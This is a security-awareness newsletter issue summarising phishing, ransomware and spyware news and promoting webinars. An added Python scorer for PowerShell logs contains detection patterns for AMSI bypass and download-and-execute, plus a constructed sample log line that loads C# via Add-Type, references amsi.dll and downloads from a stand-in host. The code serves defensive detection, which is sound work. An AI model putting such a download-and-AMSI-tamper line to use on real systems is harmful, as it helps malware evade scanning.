CyberheistNews Vol 10 #07
Now You Can Learn How to Forensically Examine Phishing Emails and Better Protect Your Organization

I have a brand-new webinar for you! You told us that you wanted to learn a lot more about how to forensically examine phishing emails and better protect your organization. Well, I asked our resident data-driven defense expert Roger Grimes to create a special webinar for you. It's tomorrow, good for CPE credits, and warmly recommended. Save your spot, register right away. :-D
[NEW FORENSICS WEBINAR] Cyber CSI: Learn How to Forensically Examine Phishing Emails to Better Protect Your Organization Today

Cybercrime has become an arms race where the bad guys constantly evolve their attacks while you, the vigilant defender, must diligently expand your know-how to prevent intrusions into your network. Staying a step ahead may even involve becoming your own cybercrime investigator, forensically examining actual phishing emails to determine the who, the where, and the how.

In this webinar, Roger Grimes, KnowBe4’s Data-Driven Defense Evangelist, will show you how to become a digital private investigator! You’ll learn:
  • How to forensically examine phishing emails and identify other types of social engineering
  • What forensic tools and techniques you can use right now
  • How to investigate rogue smishing, vishing, and social media phishes
  • How to enable your users to spot suspicious emails sent to your organization
Get inside the mind of the hacker, learn their techniques, and how to spot phishing attempts before it’s too late!

Date/Time: TOMORROW, Wednesday, February 12 @ 2:00 PM (ET)

Save My Spot!
https://event.on24.com/wcc/r/2188071/C4F6438C4D77D0555EFC52EC16F0F281?partnerref=CHN2
Another SMS Scam

A new PayPal SMS phishing campaign is making the rounds, according to Paul Ducklin at Naked Security. The text messages in this campaign purport to come from PayPal and inform recipients that unusual activity has been detected on their PayPal accounts.

If a user clicks on the link provided in the message, they’ll be taken to a legitimate-looking phishing site that spoofs PayPal’s login process. After providing their email address and password (which are sent to the attackers), users are asked to enter their mother’s maiden name, their home address, and finally their credit card and bank details.

After this, the site will redirect the user to PayPal’s real homepage in order to remove any suspicion.

An interesting aspect of this particular campaign is that the phishing site will remember victims’ IP addresses. If a victim tries to revisit the site to investigate it further, they’ll immediately be redirected to PayPal’s homepage.

PayPal phishing campaigns via email are extremely common, but Ducklin explains that SMS phishing gives the attackers several advantages. Continued at the KnowBe4 blog:
https://blog.knowbe4.com/another-sms-scam?
[Live Demo] Identify and Respond to Email Threats Faster With PhishER

Your users are likely already reporting potentially dangerous emails in some fashion within your organization. The increase of this email traffic can present a new problem!

With only approximately 1 in 10 user-reported emails being verified as actually malicious, how do you handle the real phishing attacks and email threats and, just as importantly, manage the other 90% of user-reported messages accurately and efficiently?

Now you can with PhishER, a product that allows your Incident Response team to identify and respond to email threats faster. This will save them so much time!

See how you can best manage your user-reported messages.

Join us Wednesday, February 19 @ 2:00 pm (ET) for a live 30-minute demonstration of the PhishER platform. With PhishER you can:
  • Cut through your Incident Response inbox noise and respond to the most dangerous threats more quickly
  • Automate message prioritization by rules you set into one of three categories: Clean, Spam or Threat
  • Augment your analysis and prioritization of user-reported messages with PhishML, PhishER’s new machine-learning module
  • See clusters of messages to identify a potential phishing attack against your organization
  • Meet critical SLAs within your organization to process and prioritize threats and legitimate emails
  • Integrate easily with KnowBe4’s Phish Alert email add-in button, or simply forward reported messages to a mailbox
Find out how adding PhishER can be a huge time-saver for your Incident Response team!

Date/Time: Wednesday, February 19 @ 2:00 (ET)

Save My Spot!
https://event.on24.com/wcc/r/2167033/52E3D8167FAC5AAA424813F51567BE64?partnerref=CHN1
Six Security Questions You Should Keep in Mind for Third Parties

Organizations are beginning to understand the consequences of a data breach or a phishing attack and the negative impact they can really have. But what about the security risks that come with third parties? There are always organizations that have access to (part of) the company data -- from accounting firms to health benefits organizations, among many others.

Perhaps it concerns data from employees, customers or patients; but in some cases, strategic organizational information may also be held by a third party.

More Third Parties Mean More Data Breaches

Research from the Ponemon Institute and Opus (a company focused on compliance solutions) among more than a thousand IT professionals from the United States and the United Kingdom shows that 61 percent of the companies in 2018 experienced a data breach through a third party. In 2016 that was 49 percent. The percentage is going up. According to the researchers, this is due to the popularity of outsourcing IT services and the huge increase in the number of third parties that organizations have to deal with.

Working with third parties could open up more opportunities for greater risks like data breaches. That’s why it’s so important for organizations to ask the right questions and to enforce stringent security policies before they agree to work with any third party.

Top Six Questions to Ask

For organizations that do not need an official and may not (yet) have the means to perform extensive audits of third parties, the following six questions should be asked:
  • Does this party need access to our systems?
  • What data do we share with this party?
  • Where is the data stored by them, and for how long?
  • Which third parties do they work with?
  • What measures do they take to secure the data?
  • What kind of proof can they provide that the data is safe with them?
Continued at the KnowBe4 blog:
https://blog.knowbe4.com/six-security-questions-you-should-keep-in-mind-for-third-parties
[NEW WEBINAR] Addressing the Challenge of Third-Party Vendor Risk: Securing Your Supply Chain

Your customer data, intellectual property, and financials are the lifeblood of your organization. If lost or leaked, there could be significant implications to the viability of your business. Maintaining control of that data, especially with third-party services, can be extremely challenging and requires that you ask the right questions and enforce stringent security policies.

In an environment of increased outsourcing, cloud computing adoption, and regulatory requirements, how do you manage vendor risk and ensure you have a consistent evaluation life cycle?

Join James McQuiggan, KnowBe4’s Security Awareness Advocate, to get actionable steps you can use now to better manage your third-party vendor risk.

You’ll learn:
  • The importance of securing your organization’s critical data
  • How to determine Supplier Security Proficiency
  • Why it’s important to understand the source of third-party products
  • The impact Vendor Questionnaires have on your Security Posture
  • How leveraging a GRC platform can ease the burden of risk assessments and audits
Date/Time: Wednesday, February 26 @ 2 PM (ET)

Save My Spot!
https://event.on24.com/wcc/r/2192176/49E09B861DCD3102086DEF0A259623F2?partnerref=CHN1
Heads-Up..."Ransomware 2.0" Is Here Now: Extremely Damaging, Dangerous and Disrupting

“Ransomware 2.0” requires defense in four main areas: prevention, detection, response and communications

In the last 3 months, ransomware has become a dramatically higher threat to organizations. Previously, ransomware would lock up your organization’s data and demand a ransom. In this new era, which KnowBe4 dubbed “Ransomware 2.0”, cyber criminals have quite suddenly become much more brazen and now infect networks to the point where backups alone will no longer save the victim.

The new normal for ransomware criminals is to exfiltrate your organization’s crown jewel data, steal all login credentials for employees and customers and any other highly confidential information like valuable intellectual property, and then use high-pressure extortion tactics like threatening to release the stolen data to the victim’s business partners, competitors and the general public.

“With ransomware, cyber criminals are seeking to inflict the most amount of pain and risk immediately,” said Roger Grimes, data-driven defense evangelist, KnowBe4. “They want to get paid and will do almost anything it takes to make that happen.

A new pattern emerged late last year, where a single ransomware gang started to deploy new tactics to steal, encrypt and threaten employees and customers. It proved so successful that other ransomware gangs have now started using these same tactics, precipitating us into a new era of ‘Ransomware 2.0’.”

Watch the Webinar on Demand (no registration required)

For more “Ransomware 2.0” technical details, tactics and how to protect against them, watch the new, highly popular webinar by Roger Grimes titled “Now That Ransomware Has Gone Nuclear, How Can You Avoid Becoming the Next Victim?” here:
https://www.knowbe4.com/nuclear-ransomware

Discuss This With Your Peers

KnowBe4's HackBusters Discussion Forum has a new topic called "Ransomware 2.0": No Choice But to Pay The Ransom? where you can kick around this problem with your peers and brainstorm how you defend against it:
https://discuss.hackbusters.com/t/ransomware-2-0-no-choice-but-to-pay-the-ransom/4809

Warm Regards,
Stu Sjouwerman
Founder and CEO
KnowBe4, Inc


P.S. Entrepreneur published my article: "My Employees Helped Me Build a Billion-Dollar Tech Company" https://www.entrepreneur.com/article/345775
Quotes of the Week
"Listening is a positive act: you have to put yourself out to do it."
- David Hockney, Artist (born 1937)

"Appreciation is a wonderful thing: It makes what is excellent in others belong to us as well."
- Voltaire, Philosopher (1694 - 1778)



Thanks for reading CyberheistNews

Security News
Scammers Conned a Dutch Museum Into Sending Them £2.4 Million

Scammers conned a Dutch museum into sending them £2.4 million (about $3.1 million) by posing as a real London-based art dealer who planned to sell the museum a John Constable painting, Artnet reports.

The Rijksmuseum Twenthe in the eastern Netherlands was interested in purchasing Constable’s “A View of Hampstead Heath: Child’s Hill, Harrow in the Distance.” The museum had been negotiating for months via email with the well-known art dealer Simon C. Dickinson when the conversation was hijacked by fraudsters.

The scammers then managed to convince the museum to wire the payment to a bank account in Hong Kong.

It’s not clear if the scammers hacked either party’s email accounts, and the museum and Dickinson both maintain that the other is at fault. The Rijksmuseum Twenthe tried to sue Dickinson for negligence, claiming his team knew about the fraudulent emails and didn’t warn the museum, but the lawsuit was thrown out of court. Dickinson’s lawyer told the court that the museum failed to verify that the bank account was legitimate before sending the money.

“Instead of accepting the reality of the situation, the museum has reacted by pursuing a series of hopeless claims against [Dickinson], in the hope of pinning the blame for the museum’s mistake on [the dealer],” the lawyer said.

At the moment, the museum has the painting in its possession and won’t give it back, even though Dickinson hasn’t been paid. A judge in London will decide who has rightful ownership of the artwork.

Dickinson’s managing director Emma Ward told Artnet that regardless of which side is to blame, both parties are victims of the scammers. “This unfortunate event highlights the dangers of cybercrime in the art world, which is regrettable for both the museum and Dickinson, especially when both are victims in this instance,” Ward said.

People in every field are at risk of falling victim to social engineering attacks. New-school security awareness training can enable your employees to be wary of these tricks. Artnet News has the story: https://news.artnet.com/art-world/rijksmuseum-twenthe-simon-dickinson-1765983
Unusual New Botnet-driven Phishing Attack With Tricky Downloaders

A large phishing campaign is distributing malicious Excel documents and utilizing irritating pop-ups to trick users into enabling macros, researchers at Lastline have found. The campaign is primarily focused on the Asia-Pacific region, and it’s using both generic spam emails and spearphishing to reach its targets.

The malicious macros act as downloaders for more advanced information-stealing malware, including Agent Tesla and LokiBot. One interesting aspect of the campaign is how the documents try to compel people to run the malicious macros.

When the user clicks on the document, it will be opened in Microsoft Excel. As soon as it’s opened, the document will repeatedly launch pop-up windows asking the user if they want to enable macros. The attackers achieve this by embedding multiple Excel sheets in the document and using a Rich Text Format (RTF) control word to update each one before displaying it. This makes the document launch a new pop-up for each embedded sheet.

The pop-ups will eventually cease if the user clicks “Deactivate macros” on each one, but the technique is much more persuasive than relying on a single request to allow macros.

Another notable feature of this campaign is its use of PowerShell’s Add-Type cmdlet to compile C# code and run it within the PowerShell environment. The C# code uses a common method to bypass the Windows Antimalware Scan Interface (AMSI), then downloads and executes the primary piece of malware. The Lastline researchers say the Add-Type trick allows the attackers to avoid detection by security tools that are looking for malicious PowerShell commands.

“As discussed earlier, this technique provided the attackers with great flexibility to bypass AMSI-related detection and carry out further malicious downloads,” the researchers write. “Given its effectiveness, we expect this technique to become more popular in weaponized PowerShell payloads.”

While the attackers are increasing their malware’s ability to remain undetected by technology, the entire attack can be averted if the user knows to avoid enabling macros at all costs. New-school security awareness training helps your employees to thwart the social engineering aspects of these attacks. Lastline has the story:
https://www.lastline.com/labsblog/infostealers-self-compiling-droppers-set-loose-unusual-spam-campaign/
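As an added example (not Lastline's or KnowBe4's code), here is a small Python scorer that flags PowerShell script-block log entries where Add-Type compiles inline C# alongside the other indicators the article mentions (AMSI references, native imports, downloads). The "timestamp|host|scriptblock" log format and the sample lines are constructed for this example.

```python
"""Heuristic scorer for PowerShell script-block log entries that compile inline
C# with Add-Type, the pattern Lastline observed in the campaign above.
This is an added illustration, not Lastline's or KnowBe4's code. The log
format 'timestamp|host|scriptblock' is an assumption for this example."""
import re
from dataclasses import dataclass, field

# Weighted indicators. Add-Type alone is common admin activity, so the
# scorer only flags a block when several indicators stack up.
INDICATORS = [
    (re.compile(r"Add-Type\b[^;\n]*-(TypeDefinition|MemberDefinition)", re.I),
     3, "inline C# compiled with Add-Type"),
    (re.compile(r"\bDllImport\b", re.I), 2, "P/Invoke into native code"),
    (re.compile(r"amsi", re.I), 4, "references AMSI"),
    (re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|WebClient", re.I),
     2, "downloads content"),
    (re.compile(r"Invoke-Expression|\bIEX\b", re.I), 2, "executes a string as code"),
]

@dataclass
class Finding:
    host: str
    score: int
    reasons: list = field(default_factory=list)

def score_script_block(block: str):
    """Return (score, reasons) for one logged script block."""
    score, reasons = 0, []
    for pattern, weight, label in INDICATORS:
        if pattern.search(block):
            score += weight
            reasons.append(label)
    return score, reasons

def scan_log(lines, threshold=5):
    """Return a Finding for every line whose script block scores >= threshold."""
    findings = []
    for line in lines:
        parts = line.split("|", 2)  # the script block itself may contain '|'
        if len(parts) != 3:
            continue  # malformed line: skip rather than crash the scan
        _ts, host, block = parts
        score, reasons = score_script_block(block)
        if score >= threshold:
            findings.append(Finding(host=host, score=score, reasons=reasons))
    return findings

# Constructed sample log lines (not real telemetry).
SAMPLE_LOG = [
    # Benign: an admin loading a .NET assembly by name.
    "2020-02-10T09:12:01|WS-01|Add-Type -AssemblyName System.Windows.Forms",
    # Suspicious: inline C# with P/Invoke, an AMSI reference and a download.
    "2020-02-10T09:14:33|WS-02|$src = 'using System.Runtime.InteropServices; "
    "public class L { [DllImport(\"kernel32\")] public static extern IntPtr Foo(string s); }'; "
    "Add-Type -TypeDefinition $src; [L]::Foo(\"amsi.dll\"); "
    "(New-Object Net.WebClient).DownloadString('http://example.invalid/p')",
    # Benign: a pipeline, which contains a '|' inside the block.
    "2020-02-10T09:15:00|WS-03|Get-ChildItem C:\\Users | Sort-Object Length",
]
```

Add-Type by itself is legitimate administrative activity, so the scorer weights indicators rather than alerting on the cmdlet alone; tune the weights and threshold to your environment.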
Intelligence Services Get Phishing Licenses

New York Times journalist Ben Hubbard was targeted by a spearphishing attack designed to deliver NSO Group’s Pegasus spyware, researchers at the University of Toronto’s Citizen Lab have concluded.

In 2018, Hubbard received an SMS message on his iPhone containing Arabic text that translated to “Ben Hubbard and the story of the Saudi Royal Family.” The message was accompanied by a link to arabnews365[.]com, which has since been tied to a Pegasus user associated with Saudi Arabia’s government.

Hubbard was suspicious as soon as he saw this message, so he didn’t click the link. Instead, he searched the Internet for “Ben Hubbard and the story of the Saudi Royal Family,” and didn’t find any results. He also contacted Arab News, a real Saudi Arabian newspaper, which confirmed that arabnews365[.]com wasn’t one of their domains.

Hubbard eventually turned the message over to the researchers at Citizen Lab, who determined that the domain was connected to the Saudi-linked Pegasus operator. If Hubbard had clicked the link, the Pegasus operator would have gained full access to his device.

The Citizen Lab researchers provide some interesting insights into why Hubbard was able to avoid falling for the attack.

“Academic research on journalist security shows that journalists do not share the same digital security practices and perceptions across the profession,” they write. “For example, a study found that a common mindset for journalists is to only prioritize digital security if they perceive the stories they are working on as sensitive enough to attract the attention of government authorities.

Echoing these findings, ongoing research by the Citizen Lab finds that investigative reporters tend to take digital security more seriously than their peers who work on non-investigative beats, and have higher familiarity with digital security tools and practices.”

The researchers note that this type of familiarity with security practices doesn’t always come naturally, even when people work in situations where they should be wary of social engineering attacks.

“As an investigative reporter covering a sensitive topic, Ben Hubbard was wary of suspicious messages and chose to share the one he received with us for analysis,” they continue. “Yet, not all targeted journalists are working on a topic where the risk of surveillance may be so obvious.

Some studies show that differences in education and training, alongside other variables such as financial incentives and institutional culture, may play a key role in closing or compounding gaps in digital security practices.”

New-school security awareness training can create a culture of security within your organization by teaching your employees to approach everything they do with a security-focused mindset. Citizen Lab has the story:
https://citizenlab.ca/2020/01/stopping-the-press-new-york-times-journalist-targeted-by-saudi-linked-pegasus-spyware-operator/
What KnowBe4 Customers Say

"Dear Stu, I just wanted to drop a line to mention how sterling-good Dedric Roberts was to work with last week. He reviewed my settings in Exchange and helped me set my environment up so that phish testing is working without a hitch.

Dedric also helped me set up rules so we could receive attachments in the testing -- something that had been eluding me for years now (used KnowBe4 in last job too).

This excellent technical support reconfirms how lucky we are to be using the KnowBe4 platform as part of our IS Program. Thank you from one happy customer!" - I.L., Information Security Engineer
The 10 Interesting News Items This Week
    1. Interview with the author of: "The Spy in Moscow Station: A Counterspy's Hunt for a Deadly Cold War Threat":
      https://www.thecyberwire.com/podcasts/cw-podcasts-special-2020-Eric-Haseltine-on-his-book-The-Spy-in-Moscow-Station.html

    2. Dangerous Domain Corp.com Goes Up for Sale:
      https://krebsonsecurity.com/2020/02/dangerous-domain-corp-com-goes-up-for-sale/

    3. New Ransomware Strain Hijacks A Vulnerable Windows Driver To Turn Off Your Antivirus And Infect The Network:
      https://blog.knowbe4.com/heads-up-new-ransomware-strain-hijacks-a-vulnerable-windows-driver-to-turn-off-your-antivirus-and-infect-the-network

    4. Five Security Warnings For 2020, by yours truly at Forbes:
      https://www.forbes.com/sites/forbestechcouncil/2020/02/04/five-security-warnings-for-2020/#78c1d9086b51

    5. State-sponsored Social Engineering: How You Can Protect Your Business From Iranian Cyber Threats:
      https://www.riskiq.com/blog/external-threat-management/how-you-can-protect-your-business-from-iranian-cyber-threats/

    6. The CIA’s Infamous, Unsolved Cryptographic Puzzle Gets a ‘Final Clue’:
      https://www.vice.com/en_us/article/3a8k93/the-cias-infamous-unsolved-cryptographic-puzzle-gets-a-final-clue

    7. Bitbucket Abused to Infect 500,000+ Hosts with Malware Cocktail:
      https://www.bleepingcomputer.com/news/security/bitbucket-abused-to-infect-500-000-hosts-with-malware-cocktail/

    8. The Top 11 Cyber Security books:
      https://www.thesslstore.com/blog/the-best-cyber-security-books/

    9. Here’s why NSA rushed to expose a dangerous computer bug:
      https://www.washingtonpost.com/news/powerpost/paloma/the-cybersecurity-202/2020/02/06/the-cybersecurity-202-here-s-why-nsa-rushed-to-expose-a-dangerous-computer-bug/5e3b0f41602ff15f8279a52e/

    10. Disinformation 2020: FBI warns of ongoing Russian 'information warfare':
      https://boingboing.net/2020/02/05/disinformation-2020-fbi-warns.html
Cyberheist 'Fave' Links
This Week's Links We Like, Tips, Hints and Fun Stuff

Copyright © 2014-2020 KnowBe4, Inc. All rights reserved.